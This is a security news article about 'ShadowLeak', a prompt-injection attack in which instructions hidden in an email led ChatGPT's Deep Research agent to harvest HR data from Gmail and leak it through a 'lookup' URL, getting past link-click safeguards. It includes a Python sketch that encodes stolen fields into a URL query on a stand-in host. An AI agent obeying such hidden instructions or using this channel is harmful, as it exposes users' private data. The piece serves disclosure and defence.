A newly disclosed attack named ShadowLeak targets OpenAI's cloud-based ChatGPT Deep Research agent, showing how data can be exfiltrated from connected Gmail inboxes via a prompt-injection chain.
Security researchers demonstrated a proof of concept (PoC) in which a crafted prompt hidden in an email directed the agent to scan the victim's messages, extract employee names and addresses from a company's HR emails, and send that data to an attacker-controlled endpoint.
OpenAI's safeguards typically block leak-prone actions such as clicking links or rendering markdown links, but the researchers bypassed these measures by instructing the agent's built-in browser tool to open a seemingly benign public "lookup" page, embedding the harvested data in the request so that the attacker's server could log it.
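To make the mechanism concrete, the following sketch shows the general shape of such a URL-based exfiltration channel: harvested fields are encoded and appended to an innocuous-looking URL, so the receiving web server captures them in its ordinary access logs. The domain, parameter name, and record fields here are invented for illustration and are not taken from the published PoC.

```python
import base64
from urllib.parse import urlencode

def build_lookup_url(record: dict) -> str:
    """Encode harvested fields into a query parameter of a 'lookup' URL.

    This mirrors the pattern described in the article: the agent is told to
    visit a page, and the data rides along in the URL. The host
    'example-lookup.test' and parameter 'q' are hypothetical.
    """
    blob = "|".join(f"{k}={v}" for k, v in record.items()).encode()
    payload = base64.urlsafe_b64encode(blob).decode()
    return "https://example-lookup.test/employee?" + urlencode({"q": payload})

url = build_lookup_url({"name": "Jane Doe", "addr": "1 Main St"})
```

From the defender's side, the notable property is that the request itself looks like an ordinary page fetch; only the encoded query value carries the stolen data.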
Radware's analysis describes ShadowLeak as chaining email access, tool use, and autonomous web calls into silent data exfiltration that originates from OpenAI's own cloud environment, and notes that the flaw was disclosed privately to OpenAI, which applied mitigations before publication.
The incident underscores the ongoing risk of granting autonomous AI agents access to private communications. Industry groups urge careful deployment, layered security controls, and continued research into hardening such systems against prompt-injection exploits.